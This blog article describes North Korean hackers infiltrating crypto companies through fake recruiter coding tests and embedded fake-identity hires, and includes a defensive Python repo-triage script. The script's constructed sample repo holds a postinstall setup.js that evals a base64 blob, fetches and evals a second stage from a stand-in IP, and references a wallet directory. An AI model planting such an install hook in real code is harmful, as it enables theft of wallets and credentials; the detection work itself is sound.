North Korea’s Techniques for Infiltrating Crypto Companies
February 2025 was a headline-grabbing month for the state-sponsored hacking group known as the Lazarus Group, after its $1.4bn heist of the Bybit exchange. This single theft surpasses the estimated $1.1bn the group stole in all of 2024 and brings its total to around $6bn, much of which is thought to have been spent bolstering North Korea's nuclear programme.
The group uses increasingly sophisticated methods to steal funds and has hit a number of crypto projects over the last few years:
- Ronin Bridge, 2022: $600m
- Horizon Bridge, 2022: $100m
- Atomic Wallet, 2023: $100m
- Stake.com, 2023: $41m
- WazirX exchange, 2024: $235m
A notable component of their success is their ability to embed themselves deeply in the target project, often weeks or months before the heist takes place. They gain this access through social engineering and, increasingly, by exploiting recruiting pipelines.
So how are they doing this?
Fake Job Offers
A Bitdefender Labs employee came across one of their tactics first hand when a "recruiter" from a DEX got in touch over LinkedIn with an enticing job offer. The recruiter asked for their CV and GitHub profile, a standard part of the hiring process for software engineers, then arranged a technical interview where the applicant could show their coding skills, to be followed by a final conversation with the CEO about compensation.
Nothing out of the ordinary.
However, the CV and GitHub profile the applicant handed over would have been harvested for data that North Korea can use to refine its recruitment lures or to pad out its own engineers' CVs (more on that in a moment). The second, technical coding stage is where the malicious intent really came to fruition. Ahead of the session the candidate was sent a repo containing an MVP of the project and a Google form with instructions for executing the code during the interview. The files contained malicious code that scanned the candidate's device for cryptocurrency wallets, private keys, credentials and personal information to exfiltrate, along with cryptomining packages and a keylogger to capture everything typed on the device. Anyone who reached round 2 of the hiring process and followed the instructions would have had their device blown wide open, with their sensitive data and crypto assets stolen!
Whilst the Bitdefender Labs developer saw the risk early on and did not download the malware, an engineer at the Estonian exchange CoinsPaid fell foul of a very similar technique: in July 2023, after they had downloaded a file for the technical stage of a hiring process onto their work laptop, $37m was drained from the company's accounts.
https://www.insurancejournal.com/news/international/2023/08/10/734763.htm
This campaign is thought to have been running since 2023, with freelance software engineers particularly at risk of being targeted. Whilst LinkedIn is certainly a venue of choice, the same activity has been seen on Upwork, Freelancer.com, We Work Remotely, Moonlight and Crypto Jobs List.
There have also been versions where the candidate is directed to install a video conferencing app laced with malware, either a bespoke app or a trojanised build of a well-known one such as Zoom or Meet.
Red Flags and How to Protect Yourself — Job Hunting
🚩Whilst LinkedIn is a great tool for job hunting, always be cautious of cold approaches, especially from recruiters who provide limited information about the role or company.
🚩Avoid downloading documents, opening files or running any code a recruiter provides; this is the gateway hackers use to get onto your device and at your information. If a technical stage genuinely requires running their code, do it only on a disposable machine or VM that holds no wallets, keys or credentials.
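The repo in the Bitdefender story did its damage the moment the candidate installed and ran it. As an added example (this is not code from the article, from Bitdefender Labs or from any real campaign), here is the kind of quick triage a practitioner can run over a take-home repo before installing anything: it flags npm lifecycle scripts that execute automatically on `npm install`, eval and base64-decoded payloads, second-stage downloads from raw IP addresses, and references to wallet or credential paths. The indicator patterns are heuristics chosen for this example, and the sample "interview repo" it builds is constructed (the 203.0.113.10 address is from the documentation TEST-NET range).

```python
"""Pre-interview triage of a "take-home" repository (added example).

Clone the recruiter's repo somewhere disposable and scan it before
running `npm install` or anything else. The patterns below are editor-
chosen heuristics, not a definitive signature set.
"""
import json
import re
import tempfile
from pathlib import Path

# npm/yarn execute these scripts automatically during `npm install`,
# i.e. before the candidate has consciously "run" any code.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic indicators (assumptions for illustration; tune for your environment).
PATTERNS = {
    "eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)|\batob\s*\("),
    "child_process": re.compile(r"child_process"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "wallet_or_cred_path": re.compile(
        r"Local Extension Settings|wallet\.dat|Exodus|Electrum|login\.keychain|/\.ssh/"
    ),
}
SCAN_EXT = {".js", ".cjs", ".mjs", ".ts", ".json", ".py", ".sh"}


def scan_text(text, rel):
    """Return (path, indicator) pairs for every pattern that matches."""
    return [(rel, name) for name, rx in PATTERNS.items() if rx.search(text)]


def scan_package_json(text, rel):
    """Flag lifecycle scripts that would execute during install."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [(rel, "unparseable_package_json")]
    return [
        (rel, f"install_hook:{hook}={cmd}")
        for hook, cmd in data.get("scripts", {}).items()
        if hook in NPM_HOOKS
    ]


def triage_repo(root):
    """Walk the checkout (skipping node_modules) and collect findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if path.is_dir() or "node_modules" in path.parts or path.suffix not in SCAN_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(errors="replace")
        if path.name == "package.json":
            findings += scan_package_json(text, rel)
        findings += scan_text(text, rel)
    return findings


def build_sample_repo():
    """Constructed sample 'interview repo' (not a real sample): a benign app
    file plus a postinstall hook that evals a base64 blob, fetches a second
    stage from a TEST-NET address and pokes at a wallet directory."""
    root = Path(tempfile.mkdtemp(prefix="interview_repo_"))
    (root / "src").mkdir()
    (root / "src" / "index.js").write_text("export const add = (a, b) => a + b;\n")
    (root / "package.json").write_text(json.dumps({
        "name": "dex-mvp",
        "scripts": {"start": "node src/index.js", "postinstall": "node ./setup.js"},
    }))
    blob = "QUJD" * 60  # 240 chars of base64 standing in for a packed payload
    (root / "setup.js").write_text(
        f'eval(Buffer.from("{blob}", "base64").toString());\n'
        'fetch("http://203.0.113.10/stage2").then(r => r.text()).then(eval);\n'
        'const p = require("os").homedir() + "/Library/Application Support/Exodus";\n'
    )
    return root


if __name__ == "__main__":
    for rel, what in triage_repo(build_sample_repo()):
        print(f"{rel}: {what}")
```

Any hit on `install_hook:*` means the repo runs code as soon as you install its dependencies, so treat the whole thing as hostile until you have read that script; the other indicators are noisy on legitimate code and are there to tell you where to look, not to clear a repo.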
Hackers for Hire
If you have been hiring engineers for a blockchain firm in the last few years, the chances are you've had an encounter that raised your eyebrows and left you uncertain about exactly who you were talking to. I've had my fair share.
Candidates who refused to turn on their video, whose video didn't quite match their audio, or whose responses read as if lifted straight from a ChatGPT log.
Not all of these would have been North Korean hackers, but some may well have been: numerous crypto firms have reported interviewing candidates flagged as North Korea-linked, and there is now a growing list of companies that have unknowingly hired North Korean operatives.
The group uses this method both to embed its operatives within the organisations it intends to hack and to draw salaries that build up the nation's war chest.
It is estimated that North Korea earns over $600m per year from embedding its hackers within crypto (and non-crypto) companies, using a raft of fake IDs and personas to pass recruitment screening.
In one case, North Korean hackers infiltrated a Solana trading bot company and three months later stole $1.4m of tokens. In another, at an unnamed firm, the hacker downloaded sensitive company information after onboarding and held the company to ransom. In September 2021 the token launch platform MISO had $3m stolen after two freelance developers redirected funds to a wallet they controlled. In a particularly worrying case, Truflation hired not one North Korean hacker but, after an intense coordinated campaign against it, found that a third of its company was embedded North Korean actors! And it is not just smaller projects with potentially lighter hiring checks: big-name projects in the space have inadvertently hired North Korean workers, including Cosmos Hub, Injective, ZeroLend, Fantom, Sushi and Yearn Finance.
https://www.coindesk.com/tech/2024/10/02/how-north-korea-infiltrated-the-crypto-industry
Many projects only find out they employed a North Korean worker after an email or call from law enforcement, who have traced crypto payroll transactions to a Lazarus Group-linked wallet.
One widely shared method for flushing out potential North Korean actors during the hiring process is to show the candidate a picture of Kim Jong Un and ask them to insult or deface him. There have been many cases posted on LinkedIn and Twitter where the candidate either disconnects or hurls insults at the recruiter after this surprise round. So it seems to do the trick!
Red Flags and How to Protect Yourself — Hiring
(Each of the below could have a perfectly legitimate explanation, so assess them in the round and alongside other evidence!)
🚩Whilst the crypto world has many projects and founders who wish to remain pseudonymous, a new employee who refuses to put their camera on
🚩Employees who change their payroll address frequently and request payment in crypto only
🚩Employees who change their Telegram handle and other social media/networking profiles frequently
🚩Employees who seem to forget information completely or need rebriefing; this can be a sign that you're not talking to the same person each time
Stay safe out there and watch out for who you hire!
Originally published at https://www.linkedin.com.